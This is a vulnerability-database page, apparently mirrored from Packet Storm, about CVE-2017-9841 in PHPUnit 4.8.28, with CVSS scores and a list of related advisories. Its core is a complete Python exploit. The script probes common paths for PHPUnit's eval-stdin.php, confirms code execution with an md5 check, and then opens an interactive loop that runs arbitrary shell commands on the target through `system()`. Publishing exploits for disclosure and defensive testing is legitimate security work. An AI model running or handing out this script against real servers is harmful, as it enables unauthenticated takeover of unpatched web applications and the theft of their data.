Lucene search
SouzoPACKETSTORM:165812HistoryFeb 02, 2022 - 12:00 a.m.
PHP Unit 4.8.28 Remote Code Execution
2022-02-0200:00:00
souzo
packetstormsecurity.com
232
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
`# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2022/01/30
# Exploit Author: souzo
# Vendor Homepage: phpunit.de
# Version: 4.8.28
# Tested on: Unit
# CVE : CVE-2017-9841
import requests
from sys import argv
phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
def check_vuln(site):
vuln = False
try:
for i in phpfiles:
site = site+i
req = requests.get(site,headers= {
"Content-Type" : "text/html",
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
},data="<?php echo md5(phpunit_rce); ?>")
if "6dd70f16549456495373a337e6708865" in req.text:
print(f"Vulnerable: {site}")
return site
except:
return vuln
def help():
exit(f"{argv[0]} <site>")
def main():
if len(argv) < 2:
help()
if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
help()
site = argv[1]
if site.endswith("/"):
site = list(site)
site[len(site) -1 ] = ''
site = ''.join(site)
pathvuln = check_vuln(site)
if pathvuln == False:
exit("Not vuln")
try:
while True:
cmd = input("> ")
req = requests.get(str(pathvuln),headers={
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
"Content-Type" : "text/html"
},data=f'<?php system(\'{cmd}\') ?>')
print(req.text)
except Exception as ex:
exit("Error: " + str(ex))
main()
`
Related
wpvulndb
wpvulndb
Multiple Plugins - Unauthenticated RCE via PHPUnit
2017-08-26 00:00:00
osv
osv
PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841
2020-01-07 17:20:47
CVE-2017-9841
2017-06-27 17:29:00
github
github
PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841
2020-01-07 17:20:47
qualysblog
qualysblog
Risk Fact #4: Malware in your Cloud means Exploitation is underway
2023-08-29 08:02:57
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
zdt
zdt
PHP Unit 4.8.28 - Remote Code Execution (Unauthenticated) Exploit
2022-02-02 00:00:00
prion
prion
Code injection
2017-06-27 17:29:00
nuclei
nuclei
PHPUnit - Remote Code Execution
2020-08-07 08:02:28
wpexploit
wpexploit
Multiple Plugins - Unauthenticated RCE via PHPUnit
2017-08-26 00:00:00
cisa_kev
cisa_kev
PHPUnit Command Injection Vulnerability
2022-02-15 00:00:00
friendsofphp
friendsofphp
RCE vulnerability in phpunit
2016-11-13 17:52:50
RCE vulnerability in phpunit
2016-11-13 17:52:50
openvas
openvas
PHPUnit 'CVE-2017-9841' RCE Vulnerability (HTTP) - Active Check
2018-04-14 00:00:00
Mageia: Security Advisory (MGASA-2017-0429)
2022-01-28 00:00:00
checkpoint_advisories
checkpoint_advisories
PHPUnit Command Injection (CVE-2017-9841)
2019-11-04 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2017-06-28 01:33:54
ubuntucve
ubuntucve
CVE-2017-9841
2017-06-27 00:00:00
thn
thn
Kinsing Actors Exploiting Recent Linux Flaw to Breach Cloud Environments
2023-11-03 13:12:00
AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials
2024-03-21 12:48:00
nessus
nessus
GLSA-201711-15 : PHPUnit: Remote code execution
2017-11-20 00:00:00
Drupal PHPUnit/Mailchimp Code Execution Vulnerability
2019-09-06 00:00:00
impervablog
impervablog
CrimeOps of the KashmirBlack Botnet β Part I
2020-10-22 13:07:28
The Resurrection of PHPUnit RCE Vulnerability
2020-02-18 18:27:41
cve
cve
CVE-2017-9841
2017-06-27 17:29:00
hackerone
hackerone
8x8: Exposed PHP dependencies at ββ.8x8.com
2021-03-22 17:56:43
attackerkb
attackerkb
CVE-2017-9841
2017-06-27 00:00:00
gentoo
gentoo
PHPUnit: Remote code execution
2017-11-19 00:00:00
debiancve
debiancve
CVE-2017-9841
2017-06-27 17:29:00
exploitdb
exploitdb
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
2022-02-02 00:00:00
threatpost
threatpost
Threatlist: Hackers Turn to Python as Attack Coding Language of Choice
2018-09-27 20:08:07
ics
ics
Known Indicators of Compromise Associated with Androxgh0st Malware
2024-01-16 12:00:00
mageia
mageia
Updated mediawiki packages fix security vulnerabilities
2017-11-29 21:52:42
cisa
cisa
CISA Adds Nine Known Exploited Vulnerabilities to Catalog
2022-02-15 00:00:00
freebsd
freebsd
mediawiki -- multiple vulnerabilities
2017-11-14 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - October 2021
2021-10-19 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for PACKETSTORM:165812